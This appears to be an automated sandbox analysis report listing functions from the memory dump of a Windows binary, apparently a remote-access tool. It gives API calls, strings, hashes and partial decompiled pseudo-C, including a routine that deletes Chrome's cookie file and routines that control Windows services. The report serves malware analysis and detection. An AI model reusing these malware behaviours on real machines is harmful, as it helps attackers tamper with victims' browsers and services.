API String ID: 2409581025-0
Opcode ID: 6af60e49ce360855524930b4eca2d807b16946a70a4043f8cb921a89ffb20635
Instruction ID: 0fc2e5534a2b7c42170d531917568bd8e2da79da5e282c180ad07bbcb2dd1240
Opcode Fuzzy Hash: 6af60e49ce360855524930b4eca2d807b16946a70a4043f8cb921a89ffb20635
Instruction Fuzzy Hash: 892107316002149BC714FB6AE842DAEB764EF44724B50417BF940B72E1EB78AD058B9E

Uniqueness

Uniqueness Score: -1.00%

Function 004168FD, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71sleeplibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0046AACC,0046B218,?,?,?,?,?,?,?,?,?,?,00413083), ref: 00416910
GetProcAddress.KERNEL32(00000000), ref: 00416917
Sleep.KERNEL32(000003E8,?,0046AACC,0046B218,?,?,?,?,?,?,?,?,?,?,00413083,00000095), ref: 00416932
__aulldiv.LIBCMT ref: 004169A6

Strings

GetSystemTimes, xrefs: 00416906
kernel32.dll, xrefs: 0041690B

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProcSleep__aulldiv
String ID: GetSystemTimes$kernel32.dll
API String ID: 482274533-1354958348
Opcode ID: d6e9ed5c123ab12829c7ec295342d512c7c96e78f39ef5b6b8260c2927aeeec4
Instruction ID: fa0abe1cd483b3ccd8dff8f9299fef532a77f392928ef75a0137482ede2a4afd
Opcode Fuzzy Hash: d6e9ed5c123ab12829c7ec295342d512c7c96e78f39ef5b6b8260c2927aeeec4
Instruction Fuzzy Hash: 4A1160B7D002286BCB14ABF5CC85DFFBB7CEA44654F05466BF901A3141ED789A4886A8

Uniqueness

Uniqueness Score: -1.00%

Function 0044785A, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 004475A1: _free.LIBCMT ref: 004475CA

_free.LIBCMT ref: 004478A8

Part of subcall function 0043E9A5: HeapFree.KERNEL32(00000000,00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000), ref: 0043E9BB
Part of subcall function 0043E9A5: GetLastError.KERNEL32(00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000,00000000), ref: 0043E9CD

_free.LIBCMT ref: 004478B3
_free.LIBCMT ref: 004478BE
_free.LIBCMT ref: 00447912
_free.LIBCMT ref: 0044791D
_free.LIBCMT ref: 00447928
_free.LIBCMT ref: 00447933

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11e589efd318972886a654acc05d815c83cb5e01146f9e6b16ace510382c04e8
Instruction ID: 59082bc52d1fdfacc846767f9c1d92dc1872432fc256f060a881dfaba65e65b7
Opcode Fuzzy Hash: 11e589efd318972886a654acc05d815c83cb5e01146f9e6b16ace510382c04e8
Instruction Fuzzy Hash: FF117F71646B04BEFA20B7B2DC07FCB77BCAF05714F40082EB2996A492DB38B5065759

Uniqueness

Uniqueness Score: -1.00%

Function 00434765, Relevance: 10.6, APIs: 7, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043475C,004318A2), ref: 00434773
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00434781
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043479A
SetLastError.KERNEL32(00000000,?,0043475C,004318A2), ref: 004347EC

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b29627f58d471b0829e3087122aa1fc5ac4d74c7b9b238a63a460473222e2add
Instruction ID: e0f6f9c872c6fbc918fc20f6380fe71e19fffdf73888a6e244766e7312b6f3e1
Opcode Fuzzy Hash: b29627f58d471b0829e3087122aa1fc5ac4d74c7b9b238a63a460473222e2add
Instruction Fuzzy Hash: 2901B93620D2115EA61416757C85A571B58DB4B779F20233FF214901F1EF995C01914D

Uniqueness

Uniqueness Score: -1.00%

Function 00409F3B, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 00409F77
GetLastError.KERNEL32 ref: 00409F81

Strings

[Chrome Cookies found, cleared!], xrefs: 00409FA7
[Chrome Cookies not found], xrefs: 00409F9B
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 00409F42
UserProfile, xrefs: 00409F47

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 85822c70b18473eae0f8f6d24d3b42dd82e05a7dcef26936eb5d3821e7bff800
Instruction ID: 4e1fae2c62c6624f8af4d38efc5ee70db184cca90b2e1ceb336ec9ffa4d3f9e9
Opcode Fuzzy Hash: 85822c70b18473eae0f8f6d24d3b42dd82e05a7dcef26936eb5d3821e7bff800
Instruction Fuzzy Hash: 3F01677165410756C6087A76DD179AF7B289D11309750013FF802B35E3EE3E8D09969E

Uniqueness

Uniqueness Score: -1.00%

Function 00404FCB, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046B118,?,00404B5F,00000001,0046B118,00404B0D,00000000,00000000,00000000), ref: 00405009
SetEvent.KERNEL32(?,?,00404B5F,00000001,0046B118,00404B0D,00000000,00000000,00000000), ref: 00405015
WaitForSingleObject.KERNEL32(?,000000FF,?,00404B5F,00000001,0046B118,00404B0D,00000000,00000000,00000000), ref: 00405020
CloseHandle.KERNEL32(?,?,00404B5F,00000001,0046B118,00404B0D,00000000,00000000,00000000), ref: 00405029

Part of subcall function 00416673: GetLocalTime.KERNEL32(00000000), ref: 0041668D

Strings

[WARNING], xrefs: 00404FF1
Connection KeepAlive disabled, xrefs: 00404FE2

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: Connection KeepAlive disabled$[WARNING]
API String ID: 2993684571-804309475
Opcode ID: 22fdb98d6a1ffcfeaa17b2f51e8fef21fda86be8cb4c07d4c3ec3c7b14bccd56
Instruction ID: 2cc38afa025c777e158eb92e122cf0ac3ecfb1eb1180df72661c25660c31bdf9
Opcode Fuzzy Hash: 22fdb98d6a1ffcfeaa17b2f51e8fef21fda86be8cb4c07d4c3ec3c7b14bccd56
Instruction Fuzzy Hash: FBF0F6765047407BDF103BB58D0AA6B7F98DB02315F00097BF811915B2DAB9D8849B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416180, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30
sleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00416180(WCHAR* __ecx) {
				void* __edi;
				void* _t7;
				void* _t11;
				WCHAR* _t13;
				void* _t15;

				_t16 = _t15 - 0x18;
				_t13 = __ecx;
				L00401FCE(_t7, _t15 - 0x18, "Alarm has been triggered!");
				L00401FCE(_t7, _t16 - 0x18, "[ALARM]");
				L00416673(_t7, _t11);
				PlaySoundW(_t13, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}

0x00416182
0x00416185
0x0041618e
0x0041619d
0x004161a2
0x004161c0
0x004161c7
0x004161d4

APIs

Part of subcall function 00416673: GetLocalTime.KERNEL32(00000000), ref: 0041668D

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 004161B2
PlaySoundW.WINMM(00000000,00000000), ref: 004161C0
Sleep.KERNEL32(00002710), ref: 004161C7
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 004161D0

Strings

Alarm has been triggered!, xrefs: 00416189
[ALARM], xrefs: 00416198

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm has been triggered!$[ALARM]
API String ID: 614609389-1190268461
Opcode ID: 909da01130814eaeb559c4d0fe3d4b6c6eb3ed11b8f5479da915e83b242b3983
Instruction ID: 0dfd8e5e7125311ede57373ebec4f4b8f460b160f11e30335d8cfe5969cfd83f
Opcode Fuzzy Hash: 909da01130814eaeb559c4d0fe3d4b6c6eb3ed11b8f5479da915e83b242b3983
Instruction Fuzzy Hash: 9AE01A66B41260379A1433BB6E0FD6F2E29DEC3B61705006FFA04A719299984801C6FB

Uniqueness

Uniqueness Score: -1.00%

Function 0043C27A, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0043C27A(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x4699a0; // 0x499560
					if(_t7 != 0x469780) {
						L0043E9A5(_t7);
						 *0x4699a0 = 0x469780;
					}
				}
				L0043E9A5( *0x46aa08);
				 *0x46aa08 = 0;
				L0043E9A5( *0x46aa0c);
				 *0x46aa0c = 0;
				L0043E9A5( *0x46aa34);
				 *0x46aa34 = 0;
				L0043E9A5( *0x46aa38);
				 *0x46aa38 = 0;
				return 1;
			}

0x0043c283
0x0043c287
0x0043c289
0x0043c295
0x0043c298
0x0043c29e
0x0043c29e
0x0043c295
0x0043c2aa
0x0043c2b7
0x0043c2bd
0x0043c2c8
0x0043c2ce
0x0043c2d9
0x0043c2df
0x0043c2e7
0x0043c2f0

APIs

_free.LIBCMT ref: 0043C298

Part of subcall function 0043E9A5: HeapFree.KERNEL32(00000000,00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000), ref: 0043E9BB
Part of subcall function 0043E9A5: GetLastError.KERNEL32(00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000,00000000), ref: 0043E9CD

_free.LIBCMT ref: 0043C2AA
_free.LIBCMT ref: 0043C2BD
_free.LIBCMT ref: 0043C2CE
_free.LIBCMT ref: 0043C2DF

Strings

`OI, xrefs: 0043C2D9

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: `OI
API String ID: 776569668-3480729804
Opcode ID: 567612c88c8252b67b5b76b0cd0d6fe7659689f5c026b6ef3387d08711bb5041
Instruction ID: 4e2fa7e30996659aa0f3b8431e0bbd55b513e69b9096d6f3b50e00e01fe813fd
Opcode Fuzzy Hash: 567612c88c8252b67b5b76b0cd0d6fe7659689f5c026b6ef3387d08711bb5041
Instruction Fuzzy Hash: 83F03AB19029208F9B416F96EE414053B74EF0E738700212BF000A27B1FBBA0861DF8F

Uniqueness

Uniqueness Score: -1.00%

Function 00434E49, Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00434FD6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434FF2
__allrem.LIBCMT ref: 00435009
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435027
__allrem.LIBCMT ref: 0043503E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043505C

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 5c3e83f7111f1c2d64048950f2cf6a6687f62c78ec3ad3f0d18ba13e05cb6319
Instruction ID: f3ee0b96e1e5d34afdc43be3c109025b4aa5744c19a519118df1e5ad030b46ac
Opcode Fuzzy Hash: 5c3e83f7111f1c2d64048950f2cf6a6687f62c78ec3ad3f0d18ba13e05cb6319
Instruction Fuzzy Hash: 31811972A00B065FE7249A69CC42BAB73F8AF88728F24552FF411D76C1E779ED404798

Uniqueness

Uniqueness Score: -1.00%

Function 0043D8FF, Relevance: 9.2, APIs: 6, Instructions: 200COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0043D92B
__cftoe.LIBCMT ref: 0043D95D

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 67efa1561cc61f7553d1e90ac8b8a5af3b34460662785fc72c597c1a22a6879d
Instruction ID: 5b0e931c7bf571b8ccaffe9bb7a8fe5e499c2d1b2ed75647472d79b1823e4372
Opcode Fuzzy Hash: 67efa1561cc61f7553d1e90ac8b8a5af3b34460662785fc72c597c1a22a6879d
Instruction Fuzzy Hash: A0510B72D04205ABDF24AB69AD41FAF77B8AF4D334F24521FF414A6281DB39D900966C

Uniqueness

Uniqueness Score: -1.00%

Function 00441FC2, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044204D
__alldvrm.LIBCMT ref: 0044224E
__alldvrm.LIBCMT ref: 00442270

Strings

ScC, xrefs: 00441FC4

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID: ScC
API String ID: 1036877536-817783221
Opcode ID: 20a303a4e7ee5ad96817bca066c326b699a270666010869b4d5a276b30a08193
Instruction ID: bc13760da6215d6a0c952eff27eb8667cbf863765abe463574919e59ef5c7f0d
Opcode Fuzzy Hash: 20a303a4e7ee5ad96817bca066c326b699a270666010869b4d5a276b30a08193
Instruction Fuzzy Hash: 86A155729007869FFB218F28C9817AABBE1FF55304F5441AFF5849B382C2BC8941C759

Uniqueness

Uniqueness Score: -1.00%

Function 00440492, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00440492(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x4691e0; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E0043DAF9(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = L00440A8F(_t25, _t36, __eflags,  *0x4691e0, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00440304(_t25, _t31, 0x46a654);
							L0043E9A5(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						L0043E9A5();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E0043E0FA(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x4691e0;
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E0043DAF9(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = L00440A8F(_t27, _t37, __eflags,  *0x4691e0, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00440304(_t27, _t32, 0x46a654);
									L0043E9A5(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								L0043E9A5();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = L00440A39(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = L00440A39(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00440492
0x00440492
0x00440492
0x0044049c
0x0044049e
0x004404a3
0x004404a6
0x004404b4
0x004404bb
0x004404c0
0x004404c3
0x004404c6
0x004404d8
0x004404dd
0x004404df
0x004404ea
0x004404f1
0x004404f6
0x004404f9
0x004404fb
0x00000000
0x00000000
0x00000000
0x00000000
0x004404e1
0x004404e1
0x00000000
0x004404e1
0x004404c8
0x004404c8
0x004404c9
0x004404c9
0x004404ce
0x00440509
0x0044050a
0x00440510
0x00440515
0x00440518
0x00440519
0x0044051a
0x00440521
0x00440523
0x00440525
0x0044052a
0x0044052d
0x0044053b
0x00440547
0x0044054a
0x0044054d
0x0044055f
0x00440564
0x00440566
0x00440571
0x00440577
0x0044057f
0x00440581
0x00000000
0x00000000
0x00000000
0x00000000
0x00440568
0x00440568
0x00000000
0x00440568
0x0044054f
0x0044054f
0x00440550
0x00440550
0x00440583
0x00440584
0x00440584
0x0044052f
0x00440535
0x00440539
0x0044058c
0x0044058d
0x00440593
0x00000000
0x00000000
0x00000000
0x00440539
0x0044059a
0x0044059a
0x004404a8
0x004404ae
0x004404b2
0x004404fd
0x004404fe
0x00440508
0x00000000
0x00000000
0x00000000
0x004404b2

APIs

GetLastError.KERNEL32(?,00000000,0043A28E,?,00416AB2,-0046CD0C,?,?,?,?,?,0040AE92,.vbs), ref: 00440496
_free.LIBCMT ref: 004404C9
_free.LIBCMT ref: 004404F1
SetLastError.KERNEL32(00000000,?,00416AB2,-0046CD0C,?,?,?,?,?,0040AE92,.vbs), ref: 004404FE
SetLastError.KERNEL32(00000000,?,00416AB2,-0046CD0C,?,?,?,?,?,0040AE92,.vbs), ref: 0044050A
_abort.LIBCMT ref: 00440510

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 8a9a31a1d31bd421db63fc213d33d4a483960eb62dd58d18f2d0d7ef31f02985
Instruction ID: b86513ad74f99d7d9aa89125b83e0aed1cdf18279c045022c177eaa00c1ea91b
Opcode Fuzzy Hash: 8a9a31a1d31bd421db63fc213d33d4a483960eb62dd58d18f2d0d7ef31f02985
Instruction Fuzzy Hash: 8EF0F93A10460137F61127666C09B1F16299FD2775F25012BFB04A22D2FEBC8D22456E

Uniqueness

Uniqueness Score: -1.00%

Function 00415E51, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,?,00415A02), ref: 00415E60
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,?,00415A02), ref: 00415E74
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00415A02), ref: 00415E81
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00415A02), ref: 00415E90
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00415A02), ref: 00415EA2
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00415A02), ref: 00415EA5

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 64c773b19f860195a1c51e2a33cdbf9ef27a0f3c03bc540714a45da92eaa784c
Instruction ID: 6c7865ee0b720ba1dd6208292b2488e89659d385572faf5760266a3e072c8958
Opcode Fuzzy Hash: 64c773b19f860195a1c51e2a33cdbf9ef27a0f3c03bc540714a45da92eaa784c
Instruction Fuzzy Hash: 26F0C8319413186BD3116B25DC89EFF3B6CDB86B61B000027FD0992192DB64CD46C5F5

Uniqueness

Uniqueness Score: -1.00%

Function 00415F55, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,?,00415988), ref: 00415F64
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,?,00415988), ref: 00415F78
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00415988), ref: 00415F85
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,00415988), ref: 00415F94
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00415988), ref: 00415FA6
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00415988), ref: 00415FA9

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: a391948a87eb031d8598c26d58d5452d60d01a7065f494aa3370a1df5d1d5a29
Instruction ID: 8b91d04fd7440fd4b87b7ad6b6c05c4da1f6536f1805d1749ba1733ad4f8c25c
Opcode Fuzzy Hash: a391948a87eb031d8598c26d58d5452d60d01a7065f494aa3370a1df5d1d5a29
Instruction Fuzzy Hash: 50F0C232541318ABD2116B25DC89EFF3B6CDB86B61B00002BFE09A21D2DA68CD46D5B9

Uniqueness

Uniqueness Score: -1.00%

Function 00415FBF, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,?,0041590E), ref: 00415FCE
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,?,0041590E), ref: 00415FE2
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,0041590E), ref: 00415FEF
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,0041590E), ref: 00415FFE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,0041590E), ref: 00416010
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,0041590E), ref: 00416013

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 3d20cc703d374145539f284985448d680c0945af9942de4a6a4858a7839cce3c
Instruction ID: c677bec81dd25c125636d838b33cd107baf6f5562f98a9b809f465e8299270a8
Opcode Fuzzy Hash: 3d20cc703d374145539f284985448d680c0945af9942de4a6a4858a7839cce3c
Instruction Fuzzy Hash: F4F0C8725013186BD2116B25DC89EBF3B6CDB46B61F000027FE09A2191DB68CD46D5B9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B3D7, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0041B3D7(short* __edx) {
				signed int _v8;
				intOrPtr _v12;
				short* _v16;
				short _v20;
				char _v24;
				intOrPtr _v28;
				char _v80;
				void* _t45;
				void* _t48;
				void* _t59;
				intOrPtr _t62;
				void* _t64;
				intOrPtr _t65;
				void* _t67;
				char _t68;
				char _t69;
				char* _t70;
				signed int _t71;
				short* _t72;
				signed int _t76;
				char* _t79;
				char* _t81;
				intOrPtr _t82;
				char* _t85;
				void* _t86;
				void* _t89;
				intOrPtr _t91;
				char* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				_v16 = __edx;
				_v8 = _v8 & 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = L0040BAA5();
				_t85 = "TLS_AES_128_GCM_SHA256";
				if(__edx == 0) {
					L37:
					return 0;
				}
				_t45 = L00438BA0(_t85, "ALL", 3);
				_t97 = _t96 + 0xc;
				if(_t45 == 0) {
					L36:
					return 1;
				}
				_t48 = L00438BA0(_t85, "DEFAULT", 7);
				_t98 = _t97 + 0xc;
				if(_t48 == 0) {
					goto L36;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t85;
					_t86 = L00430E90(_t85, 0x45eb34);
					if(_t86 != 0) {
						_t76 = _t86 - _t70;
						L8:
						if(_t76 <= 0x31) {
							if(_t86 != 0) {
								_t89 = _t86 - _t70;
								L15:
								L0043A6A0( &_v80, _t70, _t89);
								_t98 = _t98 + 0xc;
								_t11 = _t89 - 1; // -1
								_t90 =  ==  ? _t11 : _t89;
								_t71 = 0;
								 *((char*)(_t95 + ( ==  ? _t11 : _t89) - 0x4c)) = 0;
								if(_v28 <= 0) {
									L20:
									_t72 = _v16;
									_t91 = _v12;
									goto L21;
								}
								_t93 = 0x45f90c;
								while(1) {
									_t15 = _t93 - 4; // 0x464d54
									_t59 = L00438BA0( &_v80,  *_t15, 0x31);
									_t98 = _t98 + 0xc;
									if(_t59 == 0) {
										break;
									}
									_t67 = L00438BA0( &_v80,  *_t93, 0x31);
									_t98 = _t98 + 0xc;
									if(_t67 == 0) {
										break;
									}
									_t71 = _t71 + 1;
									_t93 = _t93 + 0xc;
									if(_t71 < _v28) {
										continue;
									}
									goto L20;
								}
								_t82 = _v20;
								if(_t82 >= 0x12b) {
									goto L37;
								}
								_t76 = _t71 * 0xc;
								_t72 = _v16;
								 *((char*)(_t72 + _t82 + 4)) =  *((intOrPtr*)(_t76 + 0x45f910));
								 *((char*)(_t72 + _t82 + 5)) =  *((intOrPtr*)(_t76 + 0x45f911));
								_t62 =  *((intOrPtr*)(_t76 + 0x45f910));
								_v20 = _t82 + 2;
								if(_t62 == 0x13) {
									L34:
									_v8 = 1;
									L35:
									_t91 = 1;
									_v12 = 1;
									goto L21;
								}
								if(_t62 != 0xc0) {
									L30:
									if(_v8 != 0) {
										L32:
										if(_v24 == 0) {
											_v24 = 1;
										}
										goto L35;
									}
									_t64 = L00430E90( &_v80, "ECDSA");
									_pop(_t76);
									if(_t64 != 0) {
										goto L34;
									}
									goto L32;
								}
								_t65 =  *((intOrPtr*)(_t76 + 0x45f911));
								if(_t65 == 0xb4 || _t65 == 0xb5) {
									goto L34;
								} else {
									goto L30;
								}
							}
							_t92 = _t70;
							_t76 =  &(_t92[1]);
							do {
								_t68 =  *_t92;
								_t92 =  &(_t92[1]);
							} while (_t68 != 0);
							_t89 = _t92 - _t76;
							goto L15;
						}
						_t89 = 0x31;
						goto L15;
					}
					_t79 = _t70;
					_t81 =  &(_t79[1]);
					do {
						_t69 =  *_t79;
						_t79 =  &(_t79[1]);
					} while (_t69 != 0);
					_t76 = _t79 - _t81;
					goto L8;
					L21:
					_t85 = _t86 + 1;
				} while (_t86 != 0);
				if(_t91 != 0) {
					_push(_t76);
					 *_t72 = _v20;
					 *((char*)(_t72 + 0x154)) = 1;
					L004189F1(_t72, _v8, _v24, _t76, 1);
				}
				return _t91;
			}

0x0041b3e0
0x0041b3e3
0x0041b3e9
0x0041b3ed
0x0041b3f0
0x0041b3f8
0x0041b3fb
0x0041b402
0x0041b5a2
0x00000000
0x0041b5a2
0x0041b410
0x0041b415
0x0041b41a
0x0041b59d
0x00000000
0x0041b59f
0x0041b428
0x0041b42d
0x0041b432
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b438
0x0041b438
0x0041b43e
0x0041b445
0x0041b44b
0x0041b45f
0x0041b461
0x0041b464
0x0041b46d
0x0041b481
0x0041b483
0x0041b489
0x0041b48e
0x0041b491
0x0041b497
0x0041b49a
0x0041b49c
